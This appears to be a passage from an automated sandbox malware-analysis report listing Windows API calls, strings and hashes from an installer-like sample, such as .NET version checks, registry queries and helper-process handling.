                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                        • String ID:
                                                                                        • API String ID: 644427674-0
                                                                                        • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                        • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                        • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                        • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                        APIs
                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                        • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                        • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                        • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                        • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                        • API String ID: 971782779-3668018701
                                                                                        • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                        • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                        • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                        • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                          • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                        • , xrefs: 004548FE
                                                                                        • RegOpenKeyEx, xrefs: 00454910
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$FormatMessageOpen
                                                                                        • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                        • API String ID: 2812809588-1577016196
                                                                                        • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                        • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                        • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                        • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                        APIs
                                                                                          • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                        Strings
                                                                                        • v4.0.30319, xrefs: 004594F1
                                                                                        • v2.0.50727, xrefs: 0045955B
                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                        • .NET Framework version %s not found, xrefs: 00459609
                                                                                        • .NET Framework not found, xrefs: 0045961D
                                                                                        • v1.1.4322, xrefs: 004595C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$Open
                                                                                        • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                        • API String ID: 2976201327-446240816
                                                                                        • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                        • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                        • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                        • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                        • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                        • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                        • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                        • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                        Strings
                                                                                        • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                        • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                        • Helper process exited., xrefs: 00458AC5
                                                                                        • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                        • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                        • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                        • API String ID: 3355656108-1243109208
                                                                                        • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                        • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                        • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                        • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                        APIs
                                                                                          • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                          • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                        Strings
                                                                                        • , xrefs: 004545B1
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                        • RegCreateKeyEx, xrefs: 004545C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFormatMessageQueryValue
                                                                                        • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                        • API String ID: 2481121983-1280779767
                                                                                        • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                        • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                        • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                        • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                        APIs
                                                                                          • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                          • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                        • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                        • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                          • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                        • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                        • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                        • API String ID: 1549857992-2312673372
                                                                                        • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                        • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                        • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                        • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                        • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                        • API String ID: 4190037839-2312295185
                                                                                        • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                        • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                        • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                        • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 004629FC
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                        • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                        • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                        • API String ID: 2610873146-3407710046
                                                                                        • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                        • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                        • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                        • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 0042F194
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                        • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                        • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                        • API String ID: 2610873146-3407710046
                                                                                        • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                        • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                        • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                        • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,02113858,00000000), ref: 00458C79
                                                                                        • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                        • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                        • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                        • String ID: CreateEvent$TransactNamedPipe
                                                                                        • API String ID: 2182916169-3012584893
                                                                                        • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                        • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                        • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                        • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                        • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                        • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                        • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                        • API String ID: 1914119943-2711329623
                                                                                        • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                        • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                        • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                        • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                        • LocalFree.KERNEL32(00651A58,00000000,00401B68), ref: 00401ACF
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,00651A58,00000000,00401B68), ref: 00401AEE
                                                                                        • LocalFree.KERNEL32(00652A58,?,00000000,00008000,00651A58,00000000,00401B68), ref: 00401B2D
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
